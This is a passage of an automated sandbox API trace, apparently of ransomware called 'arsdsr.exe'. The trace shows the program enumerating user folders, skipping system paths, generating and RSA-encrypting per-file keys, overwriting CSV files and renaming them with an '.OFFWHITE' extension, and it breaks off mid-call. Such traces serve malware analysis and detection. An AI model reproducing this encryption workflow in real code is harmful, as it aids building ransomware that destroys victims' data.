ftCreationTime.dwHighDateTime=0x1d5dd64, ftLastAccessTime.dwLowDateTime=0x6f3499c0, ftLastAccessTime.dwHighDateTime=0x1d5d910, ftLastWriteTime.dwLowDateTime=0x6f3499c0, ftLastWriteTime.dwHighDateTime=0x1d5d910, nFileSizeHigh=0x0, nFileSizeLow=0x1473f, dwReserved0=0x295cb3c, dwReserved1=0xc9372cc9, cFileName="HDVLjZ3ShqtF.csv", cAlternateFileName="HDVLJZ~1.CSV")) returned 1 [0133.098] lstrcmpiW (lpString1="HDVLjZ3ShqtF.csv", lpString2=".") returned 1 [0133.098] lstrcmpiW (lpString1="HDVLjZ3ShqtF.csv", lpString2="..") returned 1 [0133.098] lstrcmpiW (lpString1="HDVLjZ3ShqtF.csv", lpString2="...") returned 1 [0133.098] lstrcmpiW (lpString1="HDVLjZ3ShqtF.csv", lpString2="windows") returned -1 [0133.098] lstrcmpiW (lpString1="HDVLjZ3ShqtF.csv", lpString2="$recycle.bin") returned 1 [0133.098] lstrcmpiW (lpString1="HDVLjZ3ShqtF.csv", lpString2="rsa") returned -1 [0133.098] lstrcmpiW (lpString1="HDVLjZ3ShqtF.csv", lpString2="ntuser.dat") returned -1 [0133.098] lstrcmpiW (lpString1="HDVLjZ3ShqtF.csv", lpString2="programdata") returned -1 [0133.098] lstrcmpiW (lpString1="HDVLjZ3ShqtF.csv", lpString2="appdata") returned 1 [0133.098] lstrcmpiW (lpString1="HDVLjZ3ShqtF.csv", lpString2="program files") returned -1 [0133.098] lstrcmpiW (lpString1="HDVLjZ3ShqtF.csv", lpString2="program files (x86)") returned -1 [0133.098] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\" [0133.098] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\", lpString2="HDVLjZ3ShqtF.csv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\HDVLjZ3ShqtF.csv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\HDVLjZ3ShqtF.csv" [0133.098] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.098] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.098] PathFindExtensionW (pszPath="HDVLjZ3ShqtF.csv") returned=".csv" [0133.098] lstrcmpiW (lpString1=".csv", lpString2=".exe") returned -1 [0133.098] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0133.098] lstrcmpiW (lpString1=".csv", lpString2=".cab") returned 1 [0133.098] lstrcmpiW (lpString1=".csv", lpString2=".cmd") returned 1 [0133.098] lstrcmpiW (lpString1=".csv", lpString2=".com") returned 1 [0133.098] lstrcmpiW (lpString1=".csv", lpString2=".cpl") returned 1 [0133.098] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0133.098] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0133.098] lstrcmpiW (lpString1=".csv", lpString2=".url") returned -1 [0133.098] lstrcmpiW (lpString1=".csv", lpString2=".ttf") returned -1 [0133.099] lstrcmpiW (lpString1=".csv", lpString2=".mp3") returned -1 [0133.099] lstrcmpiW (lpString1=".csv", lpString2=".pif") returned -1 [0133.099] lstrcmpiW (lpString1=".csv", lpString2=".mp4") returned -1 [0133.099] lstrcmpiW (lpString1=".csv", lpString2=".OFFWHITE") returned -1 [0133.099] lstrcmpiW (lpString1=".csv", lpString2=".msi") returned -1 [0133.099] lstrcmpiW (lpString1="HDVLjZ3ShqtF.csv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.099] GetProcessHeap () returned 0x500000 [0133.099] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f6b8 [0133.099] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\HDVLjZ3ShqtF.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\hdvljz3shqtf.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0133.099] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=83775) returned 1 [0133.099] GetProcessHeap () returned 0x500000 [0133.099] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.099] GetProcessHeap () returned 0x500000 [0133.099] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.099] GetProcessHeap () returned 0x500000 [0133.099] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.099] GetProcessHeap () returned 0x500000 [0133.099] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.099] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.099] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.099] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.099] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.100] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.100] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.100] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.100] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.100] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295c910*=0x100) returned 1 [0133.100] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.100] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.100] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295c90c*=0x100) returned 1 [0133.100] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x1473f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.100] SetLastError (dwErrCode=0x0) [0133.100] WriteFile (in: hFile=0x1e4, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0133.102] GetLastError () returned 0x0 [0133.102] GetLastError () returned 0x0 [0133.102] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x1483f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.102] WriteFile (in: hFile=0x1e4, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0133.102] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x1493f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.102] WriteFile (in: hFile=0x1e4, lpBuffer=0x53f6b8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x53f6b8*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0133.102] GetProcessHeap () returned 0x500000 [0133.102] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1473f) returned 0x55d7d0 [0133.102] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.102] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0x1473f, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0x1473f, lpOverlapped=0x0) returned 1 [0133.109] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.109] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0x1473f, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0x1473f, lpOverlapped=0x0) returned 1 [0133.110] GetProcessHeap () returned 0x500000 [0133.110] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0133.110] CloseHandle (hObject=0x1e4) returned 1 [0133.115] GetProcessHeap () returned 0x500000 [0133.115] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.115] GetProcessHeap () returned 0x500000 [0133.115] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.116] GetProcessHeap () returned 0x500000 [0133.116] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.116] GetProcessHeap () returned 0x500000 [0133.116] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.116] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\HDVLjZ3ShqtF.csv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\HDVLjZ3ShqtF.csv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\HDVLjZ3ShqtF.csv" [0133.116] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\HDVLjZ3ShqtF.csv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\HDVLjZ3ShqtF.csv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\HDVLjZ3ShqtF.csv.OFFWHITE" [0133.116] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\HDVLjZ3ShqtF.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\hdvljz3shqtf.csv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\HDVLjZ3ShqtF.csv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\hdvljz3shqtf.csv.offwhite")) returned 1 [0133.117] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac13e20, ftCreationTime.dwHighDateTime=0x1d5e343, ftLastAccessTime.dwLowDateTime=0xec40a660, ftLastAccessTime.dwHighDateTime=0x1d5e636, ftLastWriteTime.dwLowDateTime=0xec40a660, ftLastWriteTime.dwHighDateTime=0x1d5e636, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295cb3c, dwReserved1=0xc9372cc9, cFileName="xd1gnEP a8wg_", cAlternateFileName="XD1GNE~1")) returned 1 [0133.117] lstrcmpiW (lpString1="xd1gnEP a8wg_", lpString2=".") returned 1 [0133.117] lstrcmpiW (lpString1="xd1gnEP a8wg_", lpString2="..") returned 1 [0133.117] lstrcmpiW (lpString1="xd1gnEP a8wg_", lpString2="...") returned 1 [0133.117] lstrcmpiW (lpString1="xd1gnEP a8wg_", lpString2="windows") returned 1 [0133.117] lstrcmpiW (lpString1="xd1gnEP a8wg_", lpString2="$recycle.bin") returned 1 [0133.117] lstrcmpiW (lpString1="xd1gnEP a8wg_", lpString2="rsa") returned 1 [0133.117] lstrcmpiW (lpString1="xd1gnEP a8wg_", lpString2="ntuser.dat") returned 1 [0133.117] lstrcmpiW (lpString1="xd1gnEP a8wg_", lpString2="programdata") returned 1 [0133.117] lstrcmpiW (lpString1="xd1gnEP a8wg_", lpString2="appdata") returned 1 [0133.117] lstrcmpiW (lpString1="xd1gnEP a8wg_", lpString2="program files") returned 1 [0133.117] lstrcmpiW (lpString1="xd1gnEP a8wg_", lpString2="program files (x86)") returned 1 [0133.117] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\" [0133.117] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\", lpString2="xd1gnEP a8wg_" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_" [0133.117] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\" [0133.117] lstrcpyW (in: lpString1=0x295c970, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\" [0133.117] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\*.*" [0133.117] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\*.*", lpFindFileData=0x295c518 | out: lpFindFileData=0x295c518*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac13e20, ftCreationTime.dwHighDateTime=0x1d5e343, ftLastAccessTime.dwLowDateTime=0xec40a660, ftLastAccessTime.dwHighDateTime=0x1d5e636, ftLastWriteTime.dwLowDateTime=0xec40a660, ftLastWriteTime.dwHighDateTime=0x1d5e636, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295c4bc, dwReserved1=0x53dc9589, cFileName=".", cAlternateFileName="")) returned 0x5447d0 [0133.123] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0133.123] FindNextFileW (in: hFindFile=0x5447d0, lpFindFileData=0x295c518 | out: lpFindFileData=0x295c518*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac13e20, ftCreationTime.dwHighDateTime=0x1d5e343, ftLastAccessTime.dwLowDateTime=0xec40a660, ftLastAccessTime.dwHighDateTime=0x1d5e636, ftLastWriteTime.dwLowDateTime=0xec40a660, ftLastWriteTime.dwHighDateTime=0x1d5e636, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295c4bc, dwReserved1=0x53dc9589, cFileName="..", cAlternateFileName="")) returned 1 [0133.123] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0133.124] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0133.124] FindNextFileW (in: hFindFile=0x5447d0, lpFindFileData=0x295c518 | out: lpFindFileData=0x295c518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e500f40, ftCreationTime.dwHighDateTime=0x1d5e2be, ftLastAccessTime.dwLowDateTime=0xb253cbb0, ftLastAccessTime.dwHighDateTime=0x1d5d85a, ftLastWriteTime.dwLowDateTime=0xb253cbb0, ftLastWriteTime.dwHighDateTime=0x1d5d85a, nFileSizeHigh=0x0, nFileSizeLow=0x117f4, dwReserved0=0x295c4bc, dwReserved1=0x53dc9589, cFileName="1uzealkfywlQgvf.csv", cAlternateFileName="1UZEAL~1.CSV")) returned 1 [0133.124] lstrcmpiW (lpString1="1uzealkfywlQgvf.csv", lpString2=".") returned 1 [0133.124] lstrcmpiW (lpString1="1uzealkfywlQgvf.csv", lpString2="..") returned 1 [0133.124] lstrcmpiW (lpString1="1uzealkfywlQgvf.csv", lpString2="...") returned 1 [0133.124] lstrcmpiW (lpString1="1uzealkfywlQgvf.csv", lpString2="windows") returned -1 [0133.124] lstrcmpiW (lpString1="1uzealkfywlQgvf.csv", lpString2="$recycle.bin") returned 1 [0133.124] lstrcmpiW (lpString1="1uzealkfywlQgvf.csv", lpString2="rsa") returned -1 [0133.124] lstrcmpiW (lpString1="1uzealkfywlQgvf.csv", lpString2="ntuser.dat") returned -1 [0133.124] lstrcmpiW (lpString1="1uzealkfywlQgvf.csv", lpString2="programdata") returned -1 [0133.124] lstrcmpiW (lpString1="1uzealkfywlQgvf.csv", lpString2="appdata") returned -1 [0133.124] lstrcmpiW (lpString1="1uzealkfywlQgvf.csv", lpString2="program files") returned -1 [0133.124] lstrcmpiW (lpString1="1uzealkfywlQgvf.csv", lpString2="program files (x86)") returned -1 [0133.124] lstrcpyW (in: lpString1=0x295c768, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\" [0133.124] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\", lpString2="1uzealkfywlQgvf.csv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\1uzealkfywlQgvf.csv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\1uzealkfywlQgvf.csv" [0133.124] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.125] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.125] PathFindExtensionW (pszPath="1uzealkfywlQgvf.csv") returned=".csv" [0133.125] lstrcmpiW (lpString1=".csv", lpString2=".exe") returned -1 [0133.125] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0133.125] lstrcmpiW (lpString1=".csv", lpString2=".cab") returned 1 [0133.125] lstrcmpiW (lpString1=".csv", lpString2=".cmd") returned 1 [0133.125] lstrcmpiW (lpString1=".csv", lpString2=".com") returned 1 [0133.126] lstrcmpiW (lpString1=".csv", lpString2=".cpl") returned 1 [0133.126] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0133.126] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0133.126] lstrcmpiW (lpString1=".csv", lpString2=".url") returned -1 [0133.126] lstrcmpiW (lpString1=".csv", lpString2=".ttf") returned -1 [0133.126] lstrcmpiW (lpString1=".csv", lpString2=".mp3") returned -1 [0133.126] lstrcmpiW (lpString1=".csv", lpString2=".pif") returned -1 [0133.126] lstrcmpiW (lpString1=".csv", lpString2=".mp4") returned -1 [0133.126] lstrcmpiW (lpString1=".csv", lpString2=".OFFWHITE") returned -1 [0133.126] lstrcmpiW (lpString1=".csv", lpString2=".msi") returned -1 [0133.126] lstrcmpiW (lpString1="1uzealkfywlQgvf.csv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.126] GetProcessHeap () returned 0x500000 [0133.126] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f6c8 [0133.126] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\xd1gnEP a8wg_\\1uzealkfywlQgvf.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\xd1gnep a8wg_\\1uzealkfywlqgvf.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0133.161] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x295c4e0 | out: lpFileSize=0x295c4e0*=71668) returned 1 [0133.161] GetProcessHeap () returned 0x500000 [0133.161] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.161] GetProcessHeap () returned 0x500000 [0133.161] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.161] GetProcessHeap () returned 0x500000 [0133.161] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.161] GetProcessHeap () returned 0x500000 [0133.161] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.162] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.162] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.162] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.162] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.162] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.162] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.162] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.162] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.162] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295c290*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295c290*=0x100) returned 1 [0133.162] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.162] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.162] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295c28c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295c28c*=0x100) returned 1 [0133.163] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x117f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.163] SetLastError (dwErrCode=0x0) [0133.163] WriteFile (in: hFile=0x20c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295c4cc*=0x100, lpOverlapped=0x0) returned 1 [0133.169] GetLastError () returned 0x0 [0133.170] GetLastError () returned 0x0 [0133.170] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x118f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.170] WriteFile (in: hFile=0x20c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295c4cc*=0x100, lpOverlapped=0x0) returned 1 [0133.170] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x119f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.170] WriteFile (in: hFile=0x20c, lpBuffer=0x53f6c8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x53f6c8*, lpNumberOfBytesWritten=0x295c4cc*=0x8, lpOverlapped=0x0) returned 1 [0133.170] GetProcessHeap () returned 0x500000 [0133.170] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x117f4) returned 0x55e7d8 [0133.170] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.170] ReadFile (in: hFile=0x20c, lpBuffer=0x55e7d8, nNumberOfBytesToRead=0x117f4, lpNumberOfBytesRead=0x295c4c0, lpOverlapped=0x0 | out: lpBuffer=0x55e7d8*, 